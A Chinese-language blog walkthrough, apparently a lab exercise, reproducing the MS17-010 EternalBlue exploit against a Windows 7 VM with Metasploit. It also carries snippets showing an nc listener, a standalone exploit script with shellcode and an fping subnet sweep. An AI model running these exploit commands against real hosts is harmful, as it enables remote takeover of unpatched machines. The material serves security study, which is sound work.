MS17 010漏洞復現

2021-09-25 11:59:23 字數 1171 閱讀 3176

實驗環境:

kali (虛擬機器)

windows 7 x64(虛擬機器)

1、檢視兩台機器的ip位址,且關閉win7防火牆

可見win7 ip為: 192.168.15.129

kali 為:192.168.15.130

啟動 mdfconsole:

-msfconsole

使用如下命令:

第一句為利用auxiliary/scanner/smb/smb_ms17_010進漏洞分析,看看這個445埠是否能被入侵。

先使用show options檢視這個模組的選項,在required那列中,yes的是必填的,no是選填的,預設已經寫好了大部分的引數,但還是需要手動設定一下rhosts的引數,即攻擊的主機ip,這裡我們寫被攻擊的win7的 ip。

設定rhosts 為win7的位址,之後執行run。看到結果綠色加號那行,主機可能存在ms17-010漏洞。確認可以通過ms17-010漏洞入侵。

使用攻擊模組 use exploit/windows/smb/ms17_010_eternalblue,

用show targets 檢視該模組適用的主機系統

show options 檢視選項。

只要設定rhost為被攻擊主機位址即可。

set rhost ***.***.***.***(被攻擊主機位址)

執行run

當結束後,看到c:\windows\system32> 即滲透成功,可以進行其餘有趣的操作。

ms17 010漏洞復現

很老的洞了,只是老師上課講了,我就復現一遍。環境靶機為windows7並且存在此漏洞 攻擊機需要python3環境 nc lvp 8888 python ms17 010.py host 192.168.217.2 file shellcode 只需這兩條命令,便可以利用成功,其中ms17 010....

MS17 010 漏洞復現

開啟msf msfconsole fping a g 起始ip 結束ip 掃瞄當前區域網活躍ip fping a g 192.168.1.1 192.168.1.250 先輸入這條命令 gem install ruby smb然後,掃瞄內網有沒有ms17 010漏洞 use auxiliary sc...

MS17 010(永恆之藍)漏洞復現

永恆之藍是2017年4月14日晚,黑客團體shadow brokers 影子經紀人 公布的一大批網路攻擊工具中的其中乙個。永恆之藍 利用windows系統的smb漏洞可以獲取系統最高許可權。5月12日,不法分子通過改造 永恆之藍 製作了wannacry勒索病毒。實驗一 獲取windows serve...